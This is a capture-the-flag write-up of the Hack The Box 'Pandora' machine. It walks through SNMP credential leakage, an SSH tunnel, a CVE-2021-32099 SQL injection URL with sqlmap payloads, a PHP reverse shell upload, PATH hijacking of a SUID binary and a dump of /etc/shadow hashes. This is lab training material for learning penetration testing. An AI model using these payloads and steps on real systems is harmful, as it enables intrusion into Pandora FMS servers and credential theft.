Hack-The-Box-walkthrough[pandora]

introduce

OS: Linux
Difficulty: Easy
Points: 20
Release: 08 Jan 2022
IP: 10.10.11.136

  • my htb rank

Enumeration

NMAP

1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.136
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We see that the TCP ports 22(ssh) and 80(http) are open. Let’s check what the port 80 gives us.

Navigating the website, it seems like all are static pages and no dynamic content is being shown. There is one form for filling sending a message to admins, but the form does not do anything except refresh the page. There is also not a robots.txt that may reveal some juicy info. Maybe there are some interesting hidden directories, let’s fire gobuster!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# gobuster dir -u http://10.10.11.136 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.136
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/12 00:51:23 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 313] [--> http://10.10.11.136/assets/]

Gobuster gives nothing interesting except, the /assets directory which contains javascript and css files and some images. Maybe this is the directory where it is fetching the contents on the main website from.

At this point we don’t have much to work with. Let’s try a UDP scan.

1
2
3
nmap -sU -sC -sV -v 10.10.11.136

Discovered open port 161/udp on 10.10.11.136

We got one port(UDP 161) SNMP. Let’s see what it has to offer. We run snmpwalk with the public community string.

public is default for most snmp servers and thats why I tried public first, if it doesn’t work, one might have to bruteforce the community string.

1
2
3
4
┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# snmpwalk -v 2c 10.10.11.136 -c public | grep daniel
iso.3.6.1.2.1.25.4.2.1.5.817 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.1119 = STRING: "-u daniel -p HotelBabylon23"

Snmpwalk gave us a bunch of details, but the most interesting one is the credentials of the user Daniel. Apparently there is a process running and the command of that includes the credentials for the user Daniel.

Let’s ssh into the box with the obtained credentials. The user “daniel” does not have a lot of privileges. Looking at /etc/passwd, there is one other user matt which might have privileges. Looking around the system, we see that along with the static website that we saw earlier, there is one another web app called pandora. But looking at the sites-enabled config, there seems to be no way to it. But making a curl request from the localhost(victim), shows something interesting.

1
2
daniel@pandora:~$ curl http://localhost
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">

It seems like only the localhost might have access to that website. Let’s create an ssh tunnel to port 80 so that we can view the website from our machine.

1
ssh -L 80:localhost:80 daniel@10.10.11.136

The pandora console opens and asks for credentials.

Common login credentials like admin/admin, admin/password don’t work. Googling pandora gives us the information that it is a monitoring system. Moreover the version of the pandora is clearly visible on the bottom of the login page: v7.0NG.742. On searching for the exploit specific to this version we come across a very interesting article.

  • Pandora FMS 742: Critical Code Vulnerabilities Explained

This article gives a detailed explanation of the underlying vulnerability. Using this sql injection we can bypass the login page and get admin access

use the following exp

  • CVE-2021-32099

just access following url

1
http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- SgGO

then refresh the page, then we are in…

or just use sqlmap to get admin’s PHPSESSID

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# sqlmap --url="http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump
......
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: session_id=-4214' OR 7546=7546#

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: session_id=''' OR (SELECT 8036 FROM(SELECT COUNT(*),CONCAT(0x716b7a6a71,(SELECT (ELT(8036=8036,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HLHR

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: session_id=''' AND (SELECT 1534 FROM (SELECT(SLEEP(5)))VpEy)-- vAqO
---

Database: pandora
Table: tsessions_php
[49 entries]
+----------------------------+------------------------------------------------------+-------------+
| id_session | data | last_active |
+----------------------------+------------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel"; | 1638783555 |
| 0ahul7feb1l9db7ffp8d25sjba | NULL | 1638789018 |
| 11umescohevmlgeoq1e6clrp4v | id_usuario|s:6:"daniel"; | 1641955048 |
| 1um23if7s531kqf5da14kf5lvm | NULL | 1638792211 |
| 2e25c62vc3odbppmg6pjbf9bum | NULL | 1638786129 |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel"; | 1638540332 |
| 3me2jjab4atfa5f8106iklh4fc | NULL | 1638795380 |
| 4f51mju7kcuonuqor3876n8o02 | NULL | 1638786842 |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel"; | 1638535373 |
| 5682e0ou1l66p921j3p93hngea | NULL | 1641959327 |
| 59qae699l0971h13qmbpqahlls | NULL | 1638787305 |
| 5bhrjn4ei51vtt33vp18p42sj4 | NULL | 1641959245 |
| 5fihkihbip2jioll1a8mcsmp6j | NULL | 1638792685 |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel"; | 1638281946 |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel"; | 1641195617 |
| 6rjav587a3lafqum2oifkvptan | NULL | 1641959355 |
| 81f3uet7p3esgiq02d4cjj48rc | NULL | 1623957150 |
| 82k8g5avplsdj83s0mkqkp77l0 | NULL | 1641959280 |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel"; | 1638446321 |
| 8upeameujo9nhki3ps0fu32cgd | NULL | 1638787267 |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel"; | 1638881787 |
| a3a49kc938u7od6e6mlip1ej80 | NULL | 1638795315 |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel"; | 1638881664 |
| cojb6rgubs18ipb35b3f6hf0vp | NULL | 1638787213 |
| d0carbrks2lvmb90ergj7jv6po | NULL | 1638786277 |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; | 1641200284 |
| fikt9p6i78no7aofn74rr71m85 | NULL | 1638786504 |
| fj5973s4hsdkl25lskua24hbsa | NULL | 1641958908 |
| fqd96rcv4ecuqs409n5qsleufi | NULL | 1638786762 |
| fvt8eacn87b0um261o6itg0fns | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; | 1641959362 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; | 1638783230 |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 |
| gf40pukfdinc63nm5lkroidde6 | NULL | 1638786349 |
| heasjj8c48ikjlvsf1uhonfesv | NULL | 1638540345 |
| hf67p6grm46nvkc89t9jfu8pvo | id_usuario|s:6:"daniel"; | 1641959232 |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel"; | 1638168492 |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel"; | 1638456173 |
| k4gk31co9jovifc0h7dpdjjhmd | NULL | 1641959269 |
| kp90bu1mlclbaenaljem590ik3 | NULL | 1638787808 |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL | 1638796348 |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel"; | 1638540482 |
| ogmrr1pttk20cm1rjjv5buu6s4 | NULL | 1641959258 |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel"; | 1637667827 |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel"; | 1638168416 |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL | 1638787723 |
| r097jr6k9s7k166vkvaj17na1u | NULL | 1638787677 |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel"; | 1638889082 |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel"; | 1638547193 |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel"; | 1638793297 |
+----------------------------+------------------------------------------------------+-------------+
......

After logging in as admin, we snoop around a bit and see that there is a file upload options. It also seems like the system is written in php. So lets use the good old php-reverse-shell.

go to admin tools -> file manager

We upload the shell and set a listener at 9000 on our machine and navigate to the shell in our browser.

1
http://localhost/pandora_console/images/php-reverse-shell.php

Voila! We get a reverse shell with the user matt and we get user.txt. Great!!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# nc -lvp 1234
listening on [any] 1234 ...
10.10.11.136: inverse host lookup failed: Unknown host
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.136] 49270
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
13:23:38 up 14 min, 1 user, load average: 0.00, 0.03, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
daniel pts/0 10.10.14.3 13:09 13:52 0.05s 0.05s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
$ whoami
matt
$ python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 3: python: not found
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
matt@pandora:/$
matt@pandora:/home/matt$ cat user.txt
48d4ff3d5d47803c2e69216fb3a7cee9

write a ssh key in matt user’s home dir

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# ssh -i id_rsa matt@10.10.11.136
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed 12 Jan 14:40:31 UTC 2022

System load: 0.14 Processes: 262
Usage of /: 63.0% of 4.87GB Users logged in: 2
Memory usage: 8% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%

=> /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jan 12 14:39:39 2022 from 10.10.17.32
matt@pandora:~$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
matt@pandora:~$ whoami
matt

After logging in, the first thing we do is obtain linpeas.sh onto the target system. Running linpeas gives some juicy info, but the most eye catching thing is a binary called pandora_backup with the SUID set.

Looking at the contents of the binary, we see that it is using tar to uncompress something from /root. Since tar is not being called with the absolute path, we can use PATH highjacking to obtain root.

We create a local file tar, with contents “/bin/sh”, append the path to our PATH env variable and run the binary and we get root and out last flag inside /root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
matt@pandora:~$ echo "/bin/sh" > tar
matt@pandora:~$ chmod +x tar
matt@pandora:~$ export PATH=$(pwd):$PATH
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
# id
uid=0(root) gid=1000(matt) groups=1000(matt)
# whoami
root
# cat /root/root.txt
956517a857308a1537fd51418aa48805
# cat /etc/shadow
root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9D6dT0cR7suhfr.:18794:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
sys:*:18659:0:99999:7:::
sync:*:18659:0:99999:7:::
games:*:18659:0:99999:7:::
man:*:18659:0:99999:7:::
lp:*:18659:0:99999:7:::
mail:*:18659:0:99999:7:::
news:*:18659:0:99999:7:::
uucp:*:18659:0:99999:7:::
proxy:*:18659:0:99999:7:::
www-data:*:18659:0:99999:7:::
backup:*:18659:0:99999:7:::
list:*:18659:0:99999:7:::
irc:*:18659:0:99999:7:::
gnats:*:18659:0:99999:7:::
nobody:*:18659:0:99999:7:::
systemd-network:*:18659:0:99999:7:::
systemd-resolve:*:18659:0:99999:7:::
systemd-timesync:*:18659:0:99999:7:::
messagebus:*:18659:0:99999:7:::
syslog:*:18659:0:99999:7:::
_apt:*:18659:0:99999:7:::
tss:*:18659:0:99999:7:::
uuidd:*:18659:0:99999:7:::
tcpdump:*:18659:0:99999:7:::
landscape:*:18659:0:99999:7:::
pollinate:*:18659:0:99999:7:::
usbmux:*:18789:0:99999:7:::
sshd:*:18789:0:99999:7:::
systemd-coredump:!!:18789::::::
matt:$6$JYpB9KogYA60PG6X$dU7jHpb3MIYYg0evztbE8Xw8dx7ok5/U0PaDT63FgQTwyJFr9DbaLa0WzeZGMFd05hrNCnoP5xTUr7Mkl2gNx1:18794:0:99999:7:::
lxd:!:18789::::::
Debian-snmp:!:18789:0:99999:7:::
mysql:!:18789:0:99999:7:::
daniel:$6$f4POti4xJyVf3/yD$7/efpNYDq.baYycVczUb4b5LlEBNami3//4TbI6lPNK2MaWPrqbdvAhLdMrfHnnZATY59rLgr4DeEZ3U8S41l/:18964:0:99999:7:::

Summary of knowledge

  • snmpwalk enum to get daniel’s ssh password
  • ssh port forwarding
  • Pandora FMS 742 sql injection(CVE-2021-32099)
  • file upload php-reverse-shell.php to get rev shell
  • PATH highjacking to obtain root

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…